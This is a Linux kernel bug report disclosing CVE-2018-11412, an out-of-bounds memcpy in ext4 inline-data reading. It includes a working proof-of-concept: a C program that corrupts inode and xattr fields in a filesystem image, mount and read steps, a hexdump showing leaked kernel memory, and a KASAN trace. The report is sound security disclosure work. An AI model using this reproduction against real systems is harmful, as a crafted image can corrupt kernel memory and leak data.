Bug 199803

Summary: out-of-bounds memcpy via non-inline system.data xattr
Product: File System Reporter: Jann Horn (Google) (jannh)
Component: ext4Assignee: fs_ext4 (fs_ext4)
Status: NEW ---    
Severity: normal CC: carnil
Priority: P1    
Hardware: All   
OS: Linux   
Kernel Version: v4.17-rc4+ Subsystem:
Regression: No Bisected commit-id:

Description Jann Horn (Google) 2018-05-22 17:53:13 UTC
ext4 can store data for small regular files as "inline data", meaning that the
data is stored inside the corresponding inode instead of in separate blocks.
Inline data is stored in two places: The first 60 bytes go in the i_block field
in the inode (which normally contains a list of blocks instead), the rest goes
in the special filesystem-internal extended attribute "system.data".

Since commit e50e5129f384 ("ext4: xattr-in-inode support", in v4.13+), ext4 can
store extended attribute values not only inline in the inode, but can also store
such values in dedicated inodes.

When a corrupted filesystem stores the system.data extended attribute value in a
dedicated inode, the kernel gets confused, causing memory corruption.



ext4_find_inline_data_nolock() attempts to locate an inode's inline data by
searching for the system.data xattr using ext4_xattr_ibody_find().
If the inode has xattrs, ext4_xattr_ibody_find() first checks them for
corruption using xattr_check_inode(), then grabs the wanted xattr using
xattr_find_entry().
xattr_check_inode() uses ext4_xattr_check_entries() to check the individual
xattrs, but skips most checks if `entry->e_value_inum != 0` (marking an xattr
whose value is in a dedicated inode) - only for inline values, length and offset
checks are performed to ensure that the value actually fits into the inode.
The problem is that ext4_find_inline_data_nolock() then assumes that the
returned xattr uses inline storage and that the returned length will fit into
the inode; it stores the length field from the xattr in
`EXT4_I(inode)->i_inline_size` without further checks.

Later, when the file is read, ext4_read_inline_data() trusts this length value,
causing an out-of-bounds memcpy() in the following line:

    memcpy(buffer,
           (void *)IFIRST(header) + le16_to_cpu(entry->e_value_offs), len);



To reproduce, on a system with kernel v4.13 or newer, ideally with KASAN on:

1. Create a new ext4 filesystem image, with 256-byte inodes and inline data
support:

    $ mkfs.ext4 -b 4096 -I 256 -O inline_data testfs.img 400k
    mke2fs 1.43.7 (16-Oct-2017)
    Creating regular file testfs.img

    Filesystem too small for a journal
    Creating filesystem with 100 4k blocks and 64 inodes

    Allocating group tables: done
    Writing inode tables: done
    Writing superblocks and filesystem accounting information: done

2. Create a 75-byte file in the new filesystem:

    $ mkdir mount
    $ sudo mount testfs.img mount
    $ sudo dd bs=75 count=1 if=/dev/zero of=mount/testfile
    1+0 records in
    1+0 records out
    75 bytes copied, 0.000811554 s, 92.4 kB/s
    $ sudo umount mount

3. Bump up the inode size, bump up the xattr size, and mark the xattr value as
   non-inline:

    $ cat fixup.c
    #include <stdint.h>
    #include <fcntl.h>
    #include <err.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/mman.h>
    #include <sys/stat.h>

    #define __le16 uint16_t
    #define __le32 uint32_t
    #define __u16 uint16_t
    #define __u32 uint32_t
    #define __u8 uint8_t

    /* some definitions from kernel headers */
    #define EXT4_NDIR_BLOCKS    12
    #define EXT4_IND_BLOCK      EXT4_NDIR_BLOCKS
    #define EXT4_DIND_BLOCK     (EXT4_IND_BLOCK + 1)
    #define EXT4_TIND_BLOCK     (EXT4_DIND_BLOCK + 1)
    #define EXT4_N_BLOCKS       (EXT4_TIND_BLOCK + 1)
    #define EXT4_XATTR_MAGIC    0xEA020000
    struct ext4_inode {
      __le16  i_mode;
      __le16  i_uid;
      __le32  i_size_lo;
      __le32  i_atime;
      __le32  i_ctime;
      __le32  i_mtime;
      __le32  i_dtime;
      __le16  i_gid;
      __le16  i_links_count;
      __le32  i_blocks_lo;
      __le32  i_flags;
      union {
        struct {
          __le32  l_i_version;
        } linux1;
      } osd1;
      __le32  i_block[EXT4_N_BLOCKS];
      __le32  i_generation;
      __le32  i_file_acl_lo;
      __le32  i_size_high;
      __le32  i_obso_faddr;
      union {
        struct {
          __le16  l_i_blocks_high;
          __le16  l_i_file_acl_high;
          __le16  l_i_uid_high;
          __le16  l_i_gid_high;
          __le16  l_i_checksum_lo;
          __le16  l_i_reserved;
        } linux2;
      } osd2;
      __le16  i_extra_isize;
      __le16  i_checksum_hi;
      __le32  i_ctime_extra;
      __le32  i_mtime_extra;
      __le32  i_atime_extra;
      __le32  i_crtime;
      __le32  i_crtime_extra;
      __le32  i_version_hi;
      __le32  i_projid;
    };
    struct ext4_xattr_ibody_header {
      __le32  h_magic;
    };
    struct ext4_xattr_entry {
      __u8  e_name_len;
      __u8  e_name_index;
      __le16  e_value_offs;
      __le32  e_value_inum;
      __le32  e_value_size;
      __le32  e_hash;
      char  e_name[0];
    };

    #define INODE_SIZE 256

    #define ROUND_UP(x,round) ( ((x)+((round)-1)) & ~((round)-1) )

    int main(int argc, char **argv) {
      char *path = argv[1];
      int fd = open(path, O_RDWR);
      if (fd == -1) err(1, "open");
      struct stat st;
      if (fstat(fd, &st)) err(1, "fstat");
      char *map = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE,
MAP_SHARED, fd, 0);
      if (map == MAP_FAILED) err(1, "mmap");
      for (int i=0; i<st.st_size/INODE_SIZE; i++) {
        struct ext4_inode *ino = (void*)(map + i * INODE_SIZE);
        if (ino->i_links_count != 1 || ino->i_size_lo != 75) continue;
        printf("found inode (idx=%d, size=%u, mode=%ho)\n",
               i, ino->i_size_lo, ino->i_mode);
        ino->i_size_lo = 60000;
        printf("  i_extra_isize = %hu\n", ino->i_extra_isize);
        struct ext4_xattr_ibody_header *hdr =
            (void*)( ((char*)ino)+128+ino->i_extra_isize );
        if (hdr->h_magic != EXT4_XATTR_MAGIC) continue;
        struct ext4_xattr_entry *entry = (void*)(hdr+1);
        while (*(uint32_t*)entry != 0) {
          printf("  attr: idx=%hhu name='%*s' offs=%hu inum=%u size=%u\n",
              entry->e_name_index, entry->e_name_len, entry->e_name,
              entry->e_value_offs, entry->e_value_inum, entry->e_value_size);
          entry->e_value_offs = 0;
          entry->e_value_inum = 20;
          entry->e_value_size = 60000;
          entry = (void*)(
              (char*)entry + sizeof(*entry) + ROUND_UP(entry->e_name_len, 4)
          );
        }
      }
    }
    $ gcc -o fixup fixup.c -Wall
    $ ./fixup testfs.img
    found inode (idx=555, size=75, mode=100644)
      i_extra_isize = 32
      attr: idx=7 name='data' offs=76 inum=0 size=15

4. Use fsck to fix up the inode checksum (but don't let it fix anything else!):

    $ fsck.ext4 -f testfs.img
    e2fsck 1.43.7 (16-Oct-2017)
    Pass 1: Checking inodes, blocks, and sizes
    Inode 12 has INLINE_DATA_FL flag but extended attribute not found.
Truncate<y>? no
    Extended attribute in inode 12 has a value size (60000) which is invalid
    Clear<y>? no
    Inode 12 passes checks, but checksum does not match inode.  Fix<y>? yes
    Pass 2: Checking directory structure
    Pass 3: Checking directory connectivity
    Pass 4: Checking reference counts
    Pass 5: Checking group summary information

    testfs.img: ***** FILE SYSTEM WAS MODIFIED *****

    testfs.img: ********** WARNING: Filesystem still has errors **********

    testfs.img: 12/64 files (0.0% non-contiguous), 13/100 blocks

5. Mount the filesystem again:

    $ sudo mount testfs.img mount

6. Read the file:

    $ hexdump -C mount/testfile
    00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
|................|
    *
    00000030  00 00 00 00 00 00 00 00  00 00 00 00 04 07 00 00
|................|
    00000040  14 00 00 00 60 ea 00 00  00 00 00 00 64 61 74 61
|....`.......data|
    00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
|................|
    *
    000004a0  31 00 00 00 00 00 00 00  e0 d1 fc 98 d7 7f 00 00
|1...............|
    000004b0  e0 07 03 99 d7 7f 00 00  00 00 00 00 00 00 00 00
|................|
    000004c0  00 00 00 00 00 00 00 00  e0 5f 00 00 00 00 00 00
|........._......|
    000004d0  64 00 00 00 00 00 00 00  f0 af 02 99 d7 7f 00 00
|d...............|
    000004e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
|................|
    [...]

7. Check dmesg:

    $ dmesg
    [...]
    [ 3211.552729]
==================================================================
    [ 3211.552782] BUG: KASAN: use-after-free in
ext4_read_inline_data+0x114/0x120 [ext4]
    [ 3211.552787] Write of size 59940 at addr ffff8802ba1d003c by
task pool/12922

    [ 3211.552796] CPU: 3 PID: 12922 Comm: pool Not tainted 4.17.0-rc4+ #7
    [ 3211.552798] Hardware name: LENOVO 20FCS12V06/20FCS12V06, BIOS
N1FET43W (1.17 ) 08/02/2016
    [ 3211.552799] Call Trace:
    [ 3211.552807]  dump_stack+0x71/0xab
    [ 3211.552813]  print_address_description+0x6a/0x250
    [ 3211.552817]  kasan_report+0x258/0x380
    [ 3211.552863]  ? ext4_read_inline_data+0x114/0x120 [ext4]
    [ 3211.552867]  memcpy+0x34/0x50
    [ 3211.552914]  ext4_read_inline_data+0x114/0x120 [ext4]
    [ 3211.552961]  ext4_read_inline_page+0x1e4/0x2a0 [ext4]
    [ 3211.553006]  ? ext4_read_inline_data+0x120/0x120 [ext4]
    [ 3211.553053]  ext4_readpage_inline+0x13e/0x160 [ext4]
    [ 3211.553101]  ext4_readpage+0xf5/0x110 [ext4]
    [ 3211.553106]  generic_file_read_iter+0x9a4/0xea0
    [ 3211.553112]  ? filemap_range_has_page+0x160/0x160
    [ 3211.553116]  ? save_stack+0x89/0xb0
    [ 3211.553120]  ? __kasan_slab_free+0x105/0x150
    [ 3211.553124]  ? aa_path_link+0x1f0/0x1f0
    [ 3211.553128]  ? do_syscall_64+0x150/0x160
    [ 3211.553132]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
    [ 3211.553137]  ? audit_watch_compare+0x1b/0x50
    [ 3211.553142]  __vfs_read+0x239/0x340
    [ 3211.553145]  ? __x64_sys_copy_file_range+0x2d0/0x2d0
    [ 3211.553149]  ? dput.part.19+0x2e/0x1b0
    [ 3211.553154]  ? auditd_test_task+0x43/0x60
    [ 3211.553158]  vfs_read+0xa5/0x190
    [ 3211.553162]  ksys_read+0xa1/0x120
    [ 3211.553166]  ? kernel_write+0xa0/0xa0
    [ 3211.553171]  do_syscall_64+0x6d/0x160
    [ 3211.553175]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
    [ 3211.553178] RIP: 0033:0x7f9ada1af72c
    [ 3211.553180] RSP: 002b:00007f9ac2258888 EFLAGS: 00000246
ORIG_RAX: 0000000000000000
    [...]
    [ 3211.553197] The buggy address belongs to the page:
    [ 3211.553202] page:ffffea000ae87400 count:2 mapcount:0
mapping:ffff88021fe57898 index:0x0
    [ 3211.553207] flags: 0x17fffc000000021(locked|lru)
    [ 3211.553213] raw: 017fffc000000021 ffff88021fe57898
0000000000000000 00000002ffffffff
    [ 3211.553219] raw: ffffea000858fc20 ffff8803d0a204a0
0000000000000000 ffff8803cf31cac0
    [ 3211.553222] page dumped because: kasan: bad access detected
    [ 3211.553224] page->mem_cgroup:ffff8803cf31cac0

    [ 3211.553229] Memory state around the buggy address:
    [ 3211.553234]  ffff8802ba1d0f00: 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00
    [ 3211.553238]  ffff8802ba1d0f80: 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00
    [ 3211.553243] >ffff8802ba1d1000: ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff
    [ 3211.553246]                    ^
    [ 3211.553250]  ffff8802ba1d1080: ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff
    [ 3211.553254]  ffff8802ba1d1100: ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff
    [ 3211.553257]
==================================================================

Occasionally this will also cause unrelated userspace processes to segfault.
Comment 1 Salvatore Bonaccorso 2018-05-24 19:53:27 UTC
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11412 was assigned for this issue by MITRE.